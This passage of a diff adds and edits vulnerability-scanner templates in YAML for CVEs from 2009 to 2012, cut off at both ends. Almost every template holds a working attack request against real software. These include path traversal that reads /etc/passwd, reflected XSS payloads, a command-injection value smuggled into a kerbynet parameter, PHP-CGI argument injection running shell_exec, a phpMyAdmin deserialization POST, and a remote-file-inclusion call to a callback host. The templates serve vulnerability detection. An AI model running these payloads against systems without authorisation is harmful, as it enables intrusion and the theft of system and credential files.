- "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"

View File

@ -0,0 +1,28 @@
id: CVE-2009-0932
info:
name: Horde - Horde_Image::factory driver Argument LFI
author: pikpikcu
severity: high
description: |
Directory traversal vulnerability in framework/Image/Image.php in Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.
reference: |
- https://www.exploit-db.com/exploits/16154
- https://nvd.nist.gov/vuln/detail/CVE-2009-0932?cpeVersion=2.2
tags: cve,cve2009,horde,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,35 @@
id: CVE-2009-1151
info:
name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability
author: princechaddha
severity: high
description: Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
reference: https://www.phpmyadmin.net/security/PMASA-2009-3/
vulhub: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
tags: cve,cve2009,phpmyadmin,rce,deserialization
requests:
- raw:
- |
POST /scripts/setup.php HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"

View File

@ -0,0 +1,24 @@
id: CVE-2009-1558
info:
name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
reference: https://www.exploit-db.com/exploits/32954
tags: cve,cve2009,iot,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,32 @@
id: CVE-2009-1872
info:
name: Adobe Coldfusion 8 linked XSS vulnerabilies
author: princechaddha
severity: medium
description: Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8.0.1, 8, and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
reference: |
- https://www.securityfocus.com/archive/1/505803/100/0/threaded
- https://www.tenable.com/cve/CVE-2009-1872
tags: cve,cve2009,adobe,xss,coldfusion
requests:
- method: GET
path:
- '{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?></script><script>alert(document.domain)</script>'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,26 @@
id: CVE-2009-4223
info:
name: KR-Web <= 1.1b2 RFI
description: KR is a web content-server based on Apache-PHP-MySql technology who gives to internet programmers some PHP classes semplifying database content access. Elsewere, it gives some admin and user tools to write, hyerarchize and authorize contents.
reference:
- https://sourceforge.net/projects/krw/
- https://www.exploit-db.com/exploits/10216
author: geeknik
severity: high
tags: cve,cve2009,krweb,rfi
requests:
- method: GET
path:
- "{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: interactsh_protocol
words:
- "http"

View File

@ -0,0 +1,27 @@
id: CVE-2009-5114
info:
name: WebGlimpse 2.18.7 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
reference: |
- https://www.exploit-db.com/exploits/36994
- https://www.cvedetails.com/cve/CVE-2009-5114
tags: cve,cve2009,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,26 @@
id: CVE-2010-2307
info:
name: Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
reference: |
- https://www.securityfocus.com/bid/40550/info
- https://nvd.nist.gov/vuln/detail/CVE-2010-2307
tags: cve,cve2010,iot,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-2682
info:
name: Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/14017
- https://www.cvedetails.com/cve/CVE-2010-2682
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -4,7 +4,10 @@ info:
name: Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI
author: pikpikcu
severity: high
reference: https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861
description: Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/.
reference: |
- https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861
- http://www.adobe.com/support/security/bulletins/apsb10-18.html
tags: cve,cve2010,coldfusion,lfi
requests:

View File

@ -0,0 +1,26 @@
id: CVE-2010-4231
info:
name: Camtron CMNC-200 IP Camera - Directory Traversal
author: daffainfo
severity: high
description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system.
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2010-4231
- https://www.exploit-db.com/exploits/15505
tags: cve,cve2010,iot,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-4617
info:
name: Joomla! Component JotLoader 2.2.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/15791
- https://www.cvedetails.com/cve/CVE-2010-4617
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,29 @@
id: CVE-2011-0049
info:
name: Majordomo2 - SMTP/HTTP Directory Traversal
author: pikpikcu
severity: high
description: Directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface.
reference: |
- https://www.exploit-db.com/exploits/16103
- https://nvd.nist.gov/vuln/detail/CVE-2011-0063
- http://www.kb.cert.org/vuls/id/363726
tags: cve,cve2011,majordomo2,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2011-1669
info:
name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)
author: daffainfo
severity: high
description: Directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.
reference: |
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669
- https://www.exploit-db.com/exploits/17119
tags: cve,cve2011,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,25 @@
id: CVE-2011-3315
info:
name: Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049.
reference: https://www.exploit-db.com/exploits/36256
tags: cve,cve2011,lfi,cisco
requests:
- method: GET
path:
- "{{BaseURL}}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,33 @@
id: CVE-2011-4336
info:
name: Tiki Wiki CMS Groupware 7.0 has XSS
author: pikpikcu
severity: medium
description: Tiki Wiki CMS Groupware 7.0 has XSS via the GET "ajax" parameter to snarf_ajax.php.
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2011-4336
- https://www.securityfocus.com/bid/48806/info
- https://seclists.org/bugtraq/2011/Nov/140
tags: cve,cve2011,xss,tikiwiki
requests:
- method: GET
path:
- "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html

View File

@ -0,0 +1,30 @@
id: CVE-2011-4618
info:
name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4618
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,30 @@
id: CVE-2011-4624
info:
name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2011-4804
info:
name: Joomla! Component com_kp - 'Controller' Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/36598
- https://www.cvedetails.com/cve/CVE-2011-4804
tags: cve,cve2011,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,30 @@
id: CVE-2011-4926
info:
name: Adminimize 1.7.22 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4926
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,30 @@
id: CVE-2011-5106
info:
name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5106
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,30 @@
id: CVE-2011-5107
info:
name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5107
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,30 @@
id: CVE-2011-5179
info:
name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5179
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,30 @@
id: CVE-2011-5181
info:
name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,30 @@
id: CVE-2011-5265
info:
name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5265
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -4,6 +4,7 @@ info:
name: Apache Struts2 S2-008 RCE
author: pikpikcu
severity: critical
description: The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
reference: https://blog.csdn.net/weixin_43416469/article/details/113850545
tags: cve,cve2012,apache,rce,struts
@ -17,7 +18,7 @@ requests:
- type: regex
regex:
- "root:[x*]:0:0"
- "root:.*:0:0"
- type: status
status:

View File

@ -0,0 +1,30 @@
id: CVE-2012-0901
info:
name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-0901
tags: cve,cve2012,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2012-0991
info:
name: OpenEMR 4.1 - Local File Inclusion
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.
reference: |
- https://www.exploit-db.com/exploits/36650
- https://www.cvedetails.com/cve/CVE-2012-0991
tags: cve,cve2012,lfi,openemr
requests:
- method: GET
path:
- "{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,35 @@
id: CVE-2012-1823
info:
name: PHP CGI v5.3.12/5.4.2 RCE
author: pikpikcu
severity: critical
reference: |
- https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823
- https://nvd.nist.gov/vuln/detail/CVE-2012-1823
description: |
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.
tags: rce,php,cve,cve2012
requests:
- raw:
- |
POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
<?php echo shell_exec("cat /etc/passwd"); ?>
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,34 @@
id: CVE-2012-1835
info:
name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Multiple cross-site scripting (XSS) vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-1835
tags: cve,cve2012,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,30 @@
id: CVE-2012-2371
info:
name: WP-FaceThumb 0.1 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-2371
tags: cve,cve2012,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

47
cves/2012/CVE-2012-3153.yaml Executable file
View File

@ -0,0 +1,47 @@
id: CVE-2012-3153
info:
name: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)
author: Sid Ahmed MALAOUI @ Realistic Security
severity: critical
description: |
Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4,
11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown
vectors related to Report Server Component.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2012-3152
- https://www.exploit-db.com/exploits/31737
tags: cve,cve2012,oracle,rce
requests:
- method: GET
path:
- "{{BaseURL}}/reports/rwservlet/showenv"
- "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(body_1, "Reports Servlet")'
- type: status
status:
- 200
- type: dsl
dsl:
- '!contains(body_2, "<html")'
- '!contains(body_2, "<HTML")'
condition: and
extractors:
- type: regex
name: windows_working_path
regex:
- ".?.?\\\\.*\\\\showenv"
- type: regex
name: linux_working_path
regex:
- "/.*/showenv"

View File

@ -0,0 +1,29 @@
id: CVE-2012-4242
info:
name: WordPress Plugin MF Gig Calendar 0.9.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4242
tags: cve,cve2012,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2012-4253
info:
name: MySQLDumper 1.24.4 - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.
reference: |
- https://www.exploit-db.com/exploits/37129
- https://www.cvedetails.com/cve/CVE-2012-4253
tags: cve,cve2012,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,30 @@
id: CVE-2012-4273
info:
name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4273
tags: cve,cve2012,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,30 @@
id: CVE-2012-4768
info:
name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4768
tags: cve,cve2012,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2012-4878
info:
name: FlatnuX CMS - Directory Traversal
author: daffainfo
severity: high
description: Path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action.
reference: |
- https://www.exploit-db.com/exploits/37034
- https://www.cvedetails.com/cve/CVE-2012-4878
tags: cve,cve2012,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,32 @@
id: CVE-2012-4889
info:
name: ManageEngine Firewall Analyzer 7.2 - Reflected Cross Site Scripting (XSS)
author: daffainfo
severity: medium
